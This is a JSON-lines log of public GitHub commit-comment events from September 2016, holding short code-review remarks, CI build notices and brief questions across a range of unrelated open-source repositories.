{"id":"4549412300","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18985077,"position":null,"line":null,"path":null,"commit_id":"178cb6f5401c9cdcd82f24a3e95c892a14bfacb3","created_at":"2016-09-12T13:52:34Z","updated_at":"2016-09-12T13:52:34Z","body":"+1 for olleharstedt : we must really think of this.\r\n\r\nBut : include the \"default input\" etc .... can be great.  Then we must use/extend http://twig.sensiolabs.org/api/master/Twig_Loader_Filesystem.html : allowing and get views from  \r\n\r\n1. This template\r\n2. Parent template (if we do such a system, and we do one)\r\n3. Plugin views (or not ?)\r\n4. Core views.\r\n\r\n"}},"created_at":"2016-09-12T13:52:34Z"}
{"id":"4549412445","type":"CommitCommentEvent","actor":{"login":"itpastorn"},"repo":{"name":"seblin99/programmering-1"},"payload":{"comment":{"id":18985078,"position":null,"line":null,"path":null,"commit_id":"21a1ac167390fe0151a5af0fecaa059367840521","created_at":"2016-09-12T13:52:36Z","updated_at":"2016-09-12T13:52:36Z","body":"Du har gjort en commit. Bra!"}},"created_at":"2016-09-12T13:52:36Z"}
{"id":"4549412718","type":"CommitCommentEvent","actor":{"login":"markus2330"},"repo":{"name":"ElektraInitiative/libelektra"},"payload":{"comment":{"id":18985080,"position":13,"line":13,"path":"src/plugins/fcrypt/fcrypt.c","commit_id":"d5f4a028da86b990351685eeb19a0aac3f61a99e","created_at":"2016-09-12T13:52:39Z","updated_at":"2016-09-12T13:52:39Z","body":"Please change the include path, then all references to ../crypto are in the CMakeLists.txt."}},"created_at":"2016-09-12T13:52:39Z"}
{"id":"4549412797","type":"CommitCommentEvent","actor":{"login":"farhanarnob"},"repo":{"name":"udacity/ud839_Miwok"},"payload":{"comment":{"id":18985081,"position":null,"line":null,"path":null,"commit_id":"8c9cbfe5c53b2ede38ccb73d81ecbed2bd30fb46","created_at":"2016-09-12T13:52:39Z","updated_at":"2016-09-12T13:52:39Z","body":"Sorry, After that I have solved that problem.\r\nI didn't add CategoryStyle to the TabLayout. "}},"created_at":"2016-09-12T13:52:39Z"}
{"id":"4549414370","type":"CommitCommentEvent","actor":{"login":"gale9010"},"repo":{"name":"marktreble/f3f-timer"},"payload":{"comment":{"id":18985084,"position":41,"line":41,"path":"f3Ftimer/src/main/res/values-es/strings.xml","commit_id":"5425b7015b88757753330665b200f69b5b6bc5b9","created_at":"2016-09-12T13:52:53Z","updated_at":"2016-09-12T13:52:53Z","body":"https://livef3.com/ranking/"}},"created_at":"2016-09-12T13:52:53Z"}
{"id":"4549417282","type":"CommitCommentEvent","actor":{"login":"d-salerno"},"repo":{"name":"jpata/tthbb13"},"payload":{"comment":{"id":18985091,"position":null,"line":null,"path":null,"commit_id":"92cabae815fd272db803c971f8526d3cf5bd0e23","created_at":"2016-09-12T13:53:24Z","updated_at":"2016-09-12T13:53:24Z","body":"Should it be vhbbHeppy80X ?"}},"created_at":"2016-09-12T13:53:24Z"}
{"id":"4549417842","type":"CommitCommentEvent","actor":{"login":"James1x0"},"repo":{"name":"associatedemployers/granite"},"payload":{"comment":{"id":18985092,"position":16,"line":16,"path":"app/routes/account/employee/onboard/job-information.js","commit_id":"febb4fafd7e446d4e9373aacd0bccda1d0163700","created_at":"2016-09-12T13:53:30Z","updated_at":"2016-09-12T13:53:30Z","body":"@jscottchapman Alright, so this should probably be an RSVP.hash w/ the employee, departments, and locations. Your setupController hook should then assign those appropriately. Remember that even though we are on the job-info page, the model should be the employee."}},"created_at":"2016-09-12T13:53:30Z"}
{"id":"4549418305","type":"CommitCommentEvent","actor":{"login":"njbrown09"},"repo":{"name":"AsYetUntitled/Framework"},"payload":{"comment":{"id":18985094,"position":52,"line":53,"path":"Altis_Life.Altis/config/Config_Garages.hpp","commit_id":"bf85ee3e7f14bb928e8d9846203e043510be115f","created_at":"2016-09-12T13:53:35Z","updated_at":"2016-09-12T13:53:35Z","body":"o;kl"}},"created_at":"2016-09-12T13:53:35Z"}
{"id":"4549419660","type":"CommitCommentEvent","actor":{"login":"rohitmanglik"},"repo":{"name":"rohitmanglik/scrap_careers"},"payload":{"comment":{"id":18985096,"position":3,"line":3,"path":"checkpoint.dat","commit_id":"521e7000c6626313fa11206a753bd6fb779573e3","created_at":"2016-09-12T13:53:49Z","updated_at":"2016-09-12T13:53:49Z","body":"Why?\r\n\r\nWhat does this file do?"}},"created_at":"2016-09-12T13:53:49Z"}
{"id":"4549421105","type":"CommitCommentEvent","actor":{"login":"jpata"},"repo":{"name":"jpata/tthbb13"},"payload":{"comment":{"id":18985101,"position":null,"line":null,"path":null,"commit_id":"92cabae815fd272db803c971f8526d3cf5bd0e23","created_at":"2016-09-12T13:54:05Z","updated_at":"2016-09-12T13:54:05Z","body":"yes, I'm working on validating the code with a clean setup and will prepare a PR tomorrow."}},"created_at":"2016-09-12T13:54:05Z"}
{"id":"4549421497","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":18985103,"position":null,"line":null,"path":null,"commit_id":"ba1092173089700f86815621e6ae281223889a0a","created_at":"2016-09-12T13:54:11Z","updated_at":"2016-09-12T13:54:11Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 246](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1202&buildTypeId=Xbim_XbimGeometry_XbimGeometry) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:28:12"}},"created_at":"2016-09-12T13:54:11Z"}
{"id":"4549421628","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":18985104,"position":null,"line":null,"path":null,"commit_id":"9a04a88f80e873b1288392e053a871aa3917c529","created_at":"2016-09-12T13:54:12Z","updated_at":"2016-09-12T13:54:12Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 247](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1203&buildTypeId=Xbim_XbimGeometry_XbimGeometry) is now running\n"}},"created_at":"2016-09-12T13:54:12Z"}
{"id":"4549423160","type":"CommitCommentEvent","actor":{"login":"James1x0"},"repo":{"name":"associatedemployers/granite"},"payload":{"comment":{"id":18985107,"position":5,"line":44,"path":"app/templates/account/employee/onboard/job-information.hbs","commit_id":"febb4fafd7e446d4e9373aacd0bccda1d0163700","created_at":"2016-09-12T13:54:26Z","updated_at":"2016-09-12T13:54:26Z","body":"@jscottchapman In the end if your setupController sets the model as the employee, you'll want to change this back to `model.location`"}},"created_at":"2016-09-12T13:54:26Z"}
{"id":"4549424751","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/balrog"},"payload":{"comment":{"id":18985111,"position":null,"line":null,"path":null,"commit_id":"6f35e8c2aa0069bce7f3a5b1a173a78e910148b9","created_at":"2016-09-12T13:54:43Z","updated_at":"2016-09-12T13:54:43Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#esmHygDrSWiziHGHJ1Gkow"}},"created_at":"2016-09-12T13:54:43Z"}
{"id":"4549425050","type":"CommitCommentEvent","actor":{"login":"James1x0"},"repo":{"name":"associatedemployers/granite"},"payload":{"comment":{"id":18985113,"position":21,"line":58,"path":"app/templates/account/employee/onboard/job-information.hbs","commit_id":"febb4fafd7e446d4e9373aacd0bccda1d0163700","created_at":"2016-09-12T13:54:45Z","updated_at":"2016-09-12T13:54:45Z","body":"Same down here as above."}},"created_at":"2016-09-12T13:54:45Z"}
{"id":"4549425649","type":"CommitCommentEvent","actor":{"login":"dhanvi"},"repo":{"name":"ctfs/write-ups-2016"},"payload":{"comment":{"id":18985115,"position":null,"line":null,"path":null,"commit_id":"de58bcddfa488ba6768e66f5841e67face09cc23","created_at":"2016-09-12T13:54:51Z","updated_at":"2016-09-12T13:54:51Z","body":":+1: "}},"created_at":"2016-09-12T13:54:51Z"}
{"id":"4549426075","type":"CommitCommentEvent","actor":{"login":"rohitmanglik"},"repo":{"name":"rohitmanglik/scrap_careers"},"payload":{"comment":{"id":18985116,"position":49,"line":143,"path":"scrap_careers.py","commit_id":"521e7000c6626313fa11206a753bd6fb779573e3","created_at":"2016-09-12T13:54:56Z","updated_at":"2016-09-12T13:54:56Z","body":"It should be empty. Remove it."}},"created_at":"2016-09-12T13:54:56Z"}
{"id":"4549432764","type":"CommitCommentEvent","actor":{"login":"volzhs"},"repo":{"name":"godotengine/godot"},"payload":{"comment":{"id":18985132,"position":null,"line":null,"path":null,"commit_id":"37f1e86108a84c9b371e37c3854d8a03c8aea743","created_at":"2016-09-12T13:56:02Z","updated_at":"2016-09-12T13:56:02Z","body":"AWESOME FEATURE !!"}},"created_at":"2016-09-12T13:56:02Z"}
{"id":"4549432997","type":"CommitCommentEvent","actor":{"login":"thebabbageabacus"},"repo":{"name":"thebabbageabacus/9C-guides"},"payload":{"comment":{"id":18985134,"position":null,"line":null,"path":null,"commit_id":"40976e36eeb61058319f8a4e7b19e8b6f0f46522","created_at":"2016-09-12T13:56:06Z","updated_at":"2016-09-12T13:56:06Z","body":"https://drive.google.com/drive/folders/0B-3nIjoFWsVgREUyM0w3ajc3Z0k?usp=sharing"}},"created_at":"2016-09-12T13:56:06Z"}
{"id":"4549433952","type":"CommitCommentEvent","actor":{"login":"markus2330"},"repo":{"name":"ElektraInitiative/libelektra"},"payload":{"comment":{"id":18985137,"position":22,"line":22,"path":"src/plugins/fcrypt/README.md","commit_id":"d5f4a028da86b990351685eeb19a0aac3f61a99e","created_at":"2016-09-12T13:56:17Z","updated_at":"2016-09-12T13:56:17Z","body":"Would be great if we can avoid this duplication here, maybe you can do something similar to python2/python plugins? E.g. separate gpg part of crypto plugin README.md and include it at two places (+ add links so that github readers also find the place)?"}},"created_at":"2016-09-12T13:56:17Z"}
{"id":"4549436387","type":"CommitCommentEvent","actor":{"login":"Parovozik"},"repo":{"name":"benvanik/xenia"},"payload":{"comment":{"id":18985142,"position":null,"line":null,"path":null,"commit_id":"20458de7524a126c7cebeffa5d804d389e5a912a","created_at":"2016-09-12T13:56:38Z","updated_at":"2016-09-12T13:56:38Z","body":"To Darkstar.\r\nThis trouble fixed in last update, i think Dr.Chat read my comment :)"}},"created_at":"2016-09-12T13:56:38Z"}
{"id":"4549436932","type":"CommitCommentEvent","actor":{"login":"torkiljohnsen"},"repo":{"name":"vinkla/laravel-translator"},"payload":{"comment":{"id":18985143,"position":9,"line":188,"path":"tests/TranslatorTest.php","commit_id":"12b2163e85ff8dc1cd6acd674140e575127640cd","created_at":"2016-09-12T13:56:42Z","updated_at":"2016-09-12T13:56:42Z","body":"Think you should do `$this->assertTrue($article->isDirty('title'));` too."}},"created_at":"2016-09-12T13:56:42Z"}
{"id":"4549441711","type":"CommitCommentEvent","actor":{"login":"ctro"},"repo":{"name":"zacharycohn/finalproject"},"payload":{"comment":{"id":18985149,"position":17,"line":16,"path":"app/models/habit.rb","commit_id":"183d05499f55e9e709294264440c00579263d834","created_at":"2016-09-12T13:57:29Z","updated_at":"2016-09-12T13:57:29Z","body":"Hmm, should work.  Could be a ruby version problem?  Try the \"ternary\" i.e. one-line option too. it looks like \r\n`<something that is T|F> ? <do this if true> : <do this if false>`\r\nI read it with extra questioning in my voice up to the \"?\" then read \":\" as \"otherwise\"\r\n\r\nYou could also just do \"if... else... end\" in your method (without \"return\" first).  Because ruby will just return the last thing that it evaluated.  \r\n\r\nWriting a test to check when this returns t/f would be a good exercise."}},"created_at":"2016-09-12T13:57:29Z"}
{"id":"4549448014","type":"CommitCommentEvent","actor":{"login":"icc"},"repo":{"name":"h5p/h5p-video"},"payload":{"comment":{"id":18985157,"position":null,"line":null,"path":null,"commit_id":"269b166e1cff3afb74a92b96efbc721aec221af6","created_at":"2016-09-12T13:58:29Z","updated_at":"2016-09-12T13:58:29Z","body":"@fnoks I am unable to see the reason for this change?\r\n\r\nBe aware that _pressToPlay_ has only been a feature of youtube.js. Changing the API will break stuff like [this](https://github.com/h5p/h5p-interactive-video/blob/master/scripts/interactive-video.js#L573):\r\n```JavaScript\r\n// Determine source type\r\nvar isYouTube = (self.video.pressToPlay !== undefined);\r\n```\r\n\r\nI would agree that using _instanceof_ would be much more appropriate, but since the special inheritance method in Core breaks this there is no quick fix for this."}},"created_at":"2016-09-12T13:58:29Z"}
{"id":"4549449046","type":"CommitCommentEvent","actor":{"login":"ljbdelacruz"},"repo":{"name":"ljbdelacruz/OSS"},"payload":{"comment":{"id":18985160,"position":null,"line":null,"path":null,"commit_id":"fabdda902b2012da49d6c1a9f4648d0cb779bfdf","created_at":"2016-09-12T13:58:39Z","updated_at":"2016-09-12T13:58:39Z","body":"New"}},"created_at":"2016-09-12T13:58:39Z"}
{"id":"4549453100","type":"CommitCommentEvent","actor":{"login":"benbalter"},"repo":{"name":"MikeMcQuaid/mikemcquaid.github.io"},"payload":{"comment":{"id":18985165,"position":null,"line":null,"path":null,"commit_id":"1d02f2259f2ba1fa955a53bae01c8ad907646ba5","created_at":"2016-09-12T13:59:18Z","updated_at":"2016-09-12T13:59:18Z","body":"See https://github.com/jekyll/jekyll-redirect-from/issues/114. This is a known issue. While annoying/ugly, it should still work for Humans."}},"created_at":"2016-09-12T13:59:18Z"}
{"id":"4549456776","type":"CommitCommentEvent","actor":{"login":"rohitmanglik"},"repo":{"name":"rohitmanglik/scrap_careers"},"payload":{"comment":{"id":18985176,"position":null,"line":null,"path":null,"commit_id":"521e7000c6626313fa11206a753bd6fb779573e3","created_at":"2016-09-12T13:59:54Z","updated_at":"2016-09-12T13:59:54Z","body":"Excel file is empty. Please verify final output before commiting."}},"created_at":"2016-09-12T13:59:54Z"}
{"id":"4549458123","type":"CommitCommentEvent","actor":{"login":"tanhanliang"},"repo":{"name":"CUMSA/members"},"payload":{"comment":{"id":18985180,"position":null,"line":null,"path":null,"commit_id":"422071b0a3bb1ba170991c68b41b6335b5461ce1","created_at":"2016-09-12T14:00:10Z","updated_at":"2016-09-12T14:00:10Z","body":"Keeping this branch in case I need it in the future"}},"created_at":"2016-09-12T14:00:10Z"}
{"id":"4549460037","type":"CommitCommentEvent","actor":{"login":"carolramsey"},"repo":{"name":"carolramsey/carolramsey.github.io"},"payload":{"comment":{"id":18985190,"position":null,"line":null,"path":null,"commit_id":"9c7ad1230b9b6dd771f4cb1a90640db968590a5a","created_at":"2016-09-12T14:00:28Z","updated_at":"2016-09-12T14:00:28Z","body":"OK, minor edit."}},"created_at":"2016-09-12T14:00:28Z"}
{"id":"4549461729","type":"CommitCommentEvent","actor":{"login":"kpxp"},"repo":{"name":"luiges90/ZhongHuaSanGuoZhi"},"payload":{"comment":{"id":18985193,"position":null,"line":null,"path":null,"commit_id":"30cc7659f319520c13ecafc01dec24e8b6753884","created_at":"2016-09-12T14:00:44Z","updated_at":"2016-09-12T14:00:44Z","body":"@luiges90 问得怎么样了？"}},"created_at":"2016-09-12T14:00:44Z"}
{"id":"4549461926","type":"CommitCommentEvent","actor":{"login":"wongsyrone"},"repo":{"name":"wongsyrone/shadowsocks-windows"},"payload":{"comment":{"id":18985194,"position":8,"line":8,"path":"shadowsocks-csharp/Model/HotKeyConfig.cs","commit_id":"901ce0316b9fbacd2b68888faefd7d791b674cf0","created_at":"2016-09-12T14:00:45Z","updated_at":"2016-09-12T14:00:45Z","body":"find a better structure to represent the hot key"}},"created_at":"2016-09-12T14:00:45Z"}
{"id":"4549463975","type":"CommitCommentEvent","actor":{"login":"johanneswilm"},"repo":{"name":"fiduswriter/fiduswriter"},"payload":{"comment":{"id":18985198,"position":null,"line":null,"path":null,"commit_id":"90c8b29b04e8001db29a42e294d010b964e430a6","created_at":"2016-09-12T14:01:04Z","updated_at":"2016-09-12T14:01:04Z","body":"@s6fikass This is fixed in the commit I just pushed."}},"created_at":"2016-09-12T14:01:04Z"}
{"id":"4549464289","type":"CommitCommentEvent","actor":{"login":"rsoletob"},"repo":{"name":"Tecsisa/foulkon"},"payload":{"comment":{"id":18985199,"position":472,"line":1908,"path":"http/group_test.go","commit_id":"2dc71e3ccd7260b38a8f36b2715fd586620a5ce0","created_at":"2016-09-12T14:01:07Z","updated_at":"2016-09-12T14:01:07Z","body":"This isn't necessary here."}},"created_at":"2016-09-12T14:01:07Z"}
{"id":"4549464527","type":"CommitCommentEvent","actor":{"login":"jmwox"},"repo":{"name":"jmwox/My1St"},"payload":{"comment":{"id":18985200,"position":null,"line":null,"path":null,"commit_id":"6af724f95dea5f796f1e09dade10bad4311a7892","created_at":"2016-09-12T14:01:10Z","updated_at":"2016-09-12T14:01:10Z","body":"This is my comment to the 1st change in the readme"}},"created_at":"2016-09-12T14:01:10Z"}
{"id":"4549464991","type":"CommitCommentEvent","actor":{"login":"tmenier"},"repo":{"name":"tmenier/Flurl"},"payload":{"comment":{"id":18985203,"position":22,"line":42,"path":"Build/nuspec/Flurl.nuspec","commit_id":"834df5126aa855c05f50d4a96fc5cf4b97dfa3a5","created_at":"2016-09-12T14:01:14Z","updated_at":"2016-09-12T14:01:14Z","body":"@kroniak System.Globalization.Calendars seems like an odd dependency. Does System.Reflection.TypeExtension depend on it?"}},"created_at":"2016-09-12T14:01:14Z"}
{"id":"4549467167","type":"CommitCommentEvent","actor":{"login":"jbcm627"},"repo":{"name":"cwru-pat/HDFIO"},"payload":{"comment":{"id":18985208,"position":null,"line":null,"path":null,"commit_id":"b1663c100da71fe05bddbae3d2f3ad3ef983e357","created_at":"2016-09-12T14:01:34Z","updated_at":"2016-09-12T14:01:34Z","body":"Nice! Can you add a statement to the [test.cpp](https://github.com/cwru-pat/HDFIO/blob/master/tests/test.cpp#L44) file so there is a test for this function, and so there is a demonstration of how to use it?\r\n"}},"created_at":"2016-09-12T14:01:34Z"}
{"id":"4549470491","type":"CommitCommentEvent","actor":{"login":"shawnbuso"},"repo":{"name":"googleads/videojs-ima"},"payload":{"comment":{"id":18985214,"position":null,"line":null,"path":null,"commit_id":"e716d60d2cebe9dc830a09044b3eacc18d2dfb17","created_at":"2016-09-12T14:02:05Z","updated_at":"2016-09-12T14:02:05Z","body":"The countdown is placed inside the controls div though, no? Do you have a sample page where this is causing issues? I tested this in the samples before we accepted it and didn't see issues there. I also see that we are seeing sliderDiv to display none on mouseout, so I need to double check what this submitted thought he was actually fixing."}},"created_at":"2016-09-12T14:02:05Z"}
{"id":"4549482465","type":"CommitCommentEvent","actor":{"login":"AndresVanegasC"},"repo":{"name":"expand/eXpand"},"payload":{"comment":{"id":18985232,"position":null,"line":null,"path":null,"commit_id":"a67c36b9345531968e4cde5b2bd9db110f8b71fd","created_at":"2016-09-12T14:03:53Z","updated_at":"2016-09-12T14:03:53Z","body":"I followed his suggestion, but still does not work.\r\n\r\nWhat I can do?\r\n\r\nhttps://www.devexpress.com/support/center/Question/Details/T422730\r\n\r\nI installed the \".dll\" and the version of \"Xpand.ExpressApp.ImportWizard.Win\" 16.1.5.2, but I still generates the same error; sent a video where I show the error.\r\n\r\n\r\nas do I salucionar the problem presented ?.\r\n\r\n\r\nneed better support, I have the same excel file to upload, the only thing I changed at the suggestion of you, is the version of \"Xpand\".\r\n\r\n\r\nWhat else can I \r\n\r\n\r\nin the attached link is the video.\r\n\r\nWhat else can I do?"}},"created_at":"2016-09-12T14:03:53Z"}
{"id":"4549482811","type":"CommitCommentEvent","actor":{"login":"markus2330"},"repo":{"name":"ElektraInitiative/libelektra"},"payload":{"comment":{"id":18985234,"position":175,"line":175,"path":"src/plugins/fcrypt/fcrypt.c","commit_id":"d5f4a028da86b990351685eeb19a0aac3f61a99e","created_at":"2016-09-12T14:03:57Z","updated_at":"2016-09-12T14:03:57Z","body":"You need `rename` here, the commit logic needs the file to be named as it is in `keyString (parentKey)`."}},"created_at":"2016-09-12T14:03:57Z"}
{"id":"4549482973","type":"CommitCommentEvent","actor":{"login":"dericed"},"repo":{"name":"Matroska-Org/ebml-specification"},"payload":{"comment":{"id":18985235,"position":null,"line":null,"path":null,"commit_id":"96f9893d1f1ed5b822514aa284828ea30a97c7d6","created_at":"2016-09-12T14:03:58Z","updated_at":"2016-09-12T14:03:58Z","body":"Unfortunately https://xml2rfc.tools.ietf.org/public/rfc/bibxml2/ only includes the 1990 version. We'll need to make a version of \r\n\r\n```xml\r\n<?xml version=\"1.0\"?>\r\n<!DOCTYPE reference SYSTEM \"rfc2629.dtd\">\r\n<reference anchor=\"ISO.9899.1990\">\r\n    <front>\r\n        <title>Programming languages - C</title>\r\n        <author>\r\n            <organization>International Organization for Standardization</organization>\r\n        </author>\r\n        <date month=\"\" year=\"1990\"/>\r\n    </front>\r\n    <seriesInfo name=\"ISO\" value=\"Standard 9899\"/>\r\n</reference>\r\n```\r\n\r\nfor the updated version."}},"created_at":"2016-09-12T14:03:58Z"}
{"id":"4549483600","type":"CommitCommentEvent","actor":{"login":"smallButVeryStrong"},"repo":{"name":"smallButVeryStrong/-"},"payload":{"comment":{"id":18985238,"position":null,"line":null,"path":null,"commit_id":"63de0c57f9ba0dfcf5ff695a681784186448b710","created_at":"2016-09-12T14:04:05Z","updated_at":"2016-09-12T14:04:05Z","body":"展示自己的风格"}},"created_at":"2016-09-12T14:04:05Z"}
{"id":"4549484583","type":"CommitCommentEvent","actor":{"login":"jmontoyaa"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":18985244,"position":null,"line":null,"path":null,"commit_id":"743c97a508628c1444d8da55c82f15f5ef2fdf28","created_at":"2016-09-12T14:04:16Z","updated_at":"2016-09-12T14:04:16Z","body":"You can use the ScriptHandler class. I just added a change.\r\nSo you can use something like this:\r\n\r\n$deprecated = \\Chamilo\\CoreBundle\\Composer\\ScriptHandler::getFoldersToDelete();\r\n\r\n"}},"created_at":"2016-09-12T14:04:16Z"}
{"id":"4549485074","type":"CommitCommentEvent","actor":{"login":"socketpair"},"repo":{"name":"python/asyncio"},"payload":{"comment":{"id":18985246,"position":6,"line":44,"path":"asyncio/selector_events.py","commit_id":"bea3a4247a450be7fb82dec111429bb2752aac4d","created_at":"2016-09-12T14:04:21Z","updated_at":"2016-09-12T14:04:21Z","body":"faster, but not simplier to read."}},"created_at":"2016-09-12T14:04:21Z"}
{"id":"4549488397","type":"CommitCommentEvent","actor":{"login":"tmenier"},"repo":{"name":"tmenier/Flurl"},"payload":{"comment":{"id":18985254,"position":11,"line":21,"path":"PackageTesters/PackageTester.Shared/Tester.cs","commit_id":"834df5126aa855c05f50d4a96fc5cf4b97dfa3a5","created_at":"2016-09-12T14:04:54Z","updated_at":"2016-09-12T14:04:54Z","body":"@kroniak Would RealHttpTests be a better place for this test? I am not certain if it can be repro'd correctly from a unit test, maybe it has to be a console app, in which case this is fine."}},"created_at":"2016-09-12T14:04:54Z"}
{"id":"4549489009","type":"CommitCommentEvent","actor":{"login":"stepasm"},"repo":{"name":"rpm-software-management/ci-dnf-stack"},"payload":{"comment":{"id":18985256,"position":8,"line":14,"path":"dnf-docker-test/features/repolist-2.feature","commit_id":"6756a2caede2d9bd4a548c73a8a3a029e389cadd","created_at":"2016-09-12T14:05:01Z","updated_at":"2016-09-12T14:05:01Z","body":"sorry :D \r\n"}},"created_at":"2016-09-12T14:05:01Z"}
{"id":"4549489281","type":"CommitCommentEvent","actor":{"login":"markus2330"},"repo":{"name":"ElektraInitiative/libelektra"},"payload":{"comment":{"id":18985261,"position":213,"line":213,"path":"src/plugins/fcrypt/fcrypt.c","commit_id":"d5f4a028da86b990351685eeb19a0aac3f61a99e","created_at":"2016-09-12T14:05:04Z","updated_at":"2016-09-12T14:05:04Z","body":"Seems to be a copy&paste error (crypto->fcrypt)"}},"created_at":"2016-09-12T14:05:04Z"}
{"id":"4549489783","type":"CommitCommentEvent","actor":{"login":"BISTUwangSZ"},"repo":{"name":"BISTUwangSZ/2014011332Android"},"payload":{"comment":{"id":18985262,"position":null,"line":null,"path":null,"commit_id":"5d2c07355cc556a6b41e29d9c0b02453bf73c799","created_at":"2016-09-12T14:05:11Z","updated_at":"2016-09-12T14:05:11Z","body":"编程8：Activity生命周期"}},"created_at":"2016-09-12T14:05:11Z"}
{"id":"4549491745","type":"CommitCommentEvent","actor":{"login":"truckingsim"},"repo":{"name":"croscon/sw2"},"payload":{"comment":{"id":18985265,"position":23,"line":23,"path":"srv-salt/sw2/services/mysql/5-6/docker.sls","commit_id":"edb8d90191d240eb67123e2760db4678aea6da4c","created_at":"2016-09-12T14:05:29Z","updated_at":"2016-09-12T14:05:29Z","body":"same thing here isn't `DATABASE` the db name not the user?"}},"created_at":"2016-09-12T14:05:29Z"}
{"id":"4549491856","type":"CommitCommentEvent","actor":{"login":"flar2"},"repo":{"name":"flar2/kenzo"},"payload":{"comment":{"id":18985266,"position":162,"line":162,"path":"drivers/input/touchscreen/wake_gestures.c","commit_id":"a121b245eddb5bb12cf0385c29edd298e10137c1","created_at":"2016-09-12T14:05:30Z","updated_at":"2016-09-12T14:05:30Z","body":"Here's the commit:\r\nhttps://github.com/flar2/kenzo/commit/035abe17f38bf66cb266f1d1cd3e1301def5be97\r\n"}},"created_at":"2016-09-12T14:05:30Z"}
{"id":"4549494236","type":"CommitCommentEvent","actor":{"login":"joallard"},"repo":{"name":"selectize/selectize.js"},"payload":{"comment":{"id":18985272,"position":null,"line":null,"path":null,"commit_id":"51cb5c23b0ab56c00440bc1d51c8b4ebdf8d0dca","created_at":"2016-09-12T14:05:52Z","updated_at":"2016-09-12T14:05:52Z","body":"I'll try to get it out soon, but there are a few other blocking bugs that have to get out with the next release."}},"created_at":"2016-09-12T14:05:52Z"}
{"id":"4549495141","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18985277,"position":null,"line":null,"path":null,"commit_id":"feee6171dc33f402fc98c93ae9a478da3f79e49f","created_at":"2016-09-12T14:06:01Z","updated_at":"2016-09-12T14:06:01Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#CpL5DPmYToqdXUISeENKmw"}},"created_at":"2016-09-12T14:06:01Z"}
{"id":"4549496080","type":"CommitCommentEvent","actor":{"login":"apobekiaris"},"repo":{"name":"expand/eXpand"},"payload":{"comment":{"id":18985278,"position":null,"line":null,"path":null,"commit_id":"a67c36b9345531968e4cde5b2bd9db110f8b71fd","created_at":"2016-09-12T14:06:13Z","updated_at":"2016-09-12T14:06:13Z","body":"use the latest release "}},"created_at":"2016-09-12T14:06:13Z"}
{"id":"4549498709","type":"CommitCommentEvent","actor":{"login":"joallard"},"repo":{"name":"selectize/selectize.js"},"payload":{"comment":{"id":18985285,"position":null,"line":null,"path":null,"commit_id":"6ded59dcd1346fe577717ac46d1d8e7a3660fb03","created_at":"2016-09-12T14:06:39Z","updated_at":"2016-09-12T14:06:39Z","body":"@naskomit See #1143 and the master branch"}},"created_at":"2016-09-12T14:06:39Z"}
{"id":"4549499599","type":"CommitCommentEvent","actor":{"login":"zacharycohn"},"repo":{"name":"zacharycohn/finalproject"},"payload":{"comment":{"id":18985287,"position":17,"line":16,"path":"app/models/habit.rb","commit_id":"183d05499f55e9e709294264440c00579263d834","created_at":"2016-09-12T14:06:48Z","updated_at":"2016-09-12T14:06:48Z","body":"Will work on this.\n\nI did a bunch of other refactoring this weekend. Cleaned up a TON of stuff.\nThere are no more if statements in the Today or the Week views, and I\nsimplified the thirty or so lines to make the green, yellow, and red POST\nor PATCH labels into 3 lines.\n\nSO MUCH CLEANER. SO MUCH SIMPLER. loving it. :)\n\nOn Mon, Sep 12, 2016 at 9:57 AM, Clint Troxel <notifications@github.com>\nwrote:\n\n> Hmm, should work. Could be a ruby version problem? Try the \"ternary\" i.e.\n> one-line option too. it looks like\n> <something that is T|F> ? <do this if true> : <do this if false>\n> I read it with extra questioning in my voice up to the \"?\" then read \":\"\n> as \"otherwise\"\n>\n> You could also just do \"if... else... end\" in your method (without\n> \"return\" first). Because ruby will just return the last thing that it\n> evaluated.\n>\n> Writing a test to check when this returns t/f would be a good exercise.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/zacharycohn/finalproject/commit/183d05499f55e9e709294264440c00579263d834#commitcomment-18985149>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAliM1-9QkYs6gmve3KHZY9XwzLIoQIIks5qpVpKgaJpZM4J5R08>\n> .\n>\n"}},"created_at":"2016-09-12T14:06:48Z"}
{"id":"4549501912","type":"CommitCommentEvent","actor":{"login":"micbou"},"repo":{"name":"Valloric/YouCompleteMe"},"payload":{"comment":{"id":18985300,"position":null,"line":null,"path":null,"commit_id":"5dca552d5daee69c064374146bcda9e63be63b20","created_at":"2016-09-12T14:07:12Z","updated_at":"2016-09-12T14:07:12Z","body":"Do you still get the error when replacing [`except vim.error:`](https://github.com/Valloric/YouCompleteMe/blob/master/python/ycm/youcompleteme.py#L691) by `except Exception:`? I can't reproduce without UltiSnips installed."}},"created_at":"2016-09-12T14:07:12Z"}
{"id":"4549502812","type":"CommitCommentEvent","actor":{"login":"SethMichaelLarson"},"repo":{"name":"python/asyncio"},"payload":{"comment":{"id":18985301,"position":6,"line":44,"path":"asyncio/selector_events.py","commit_id":"bea3a4247a450be7fb82dec111429bb2752aac4d","created_at":"2016-09-12T14:07:20Z","updated_at":"2016-09-12T14:07:20Z","body":"I'd argue they're similar in readability but with how often _set_nodelay is used I figured speed would be a bigger issue than a slight hit in readability."}},"created_at":"2016-09-12T14:07:20Z"}
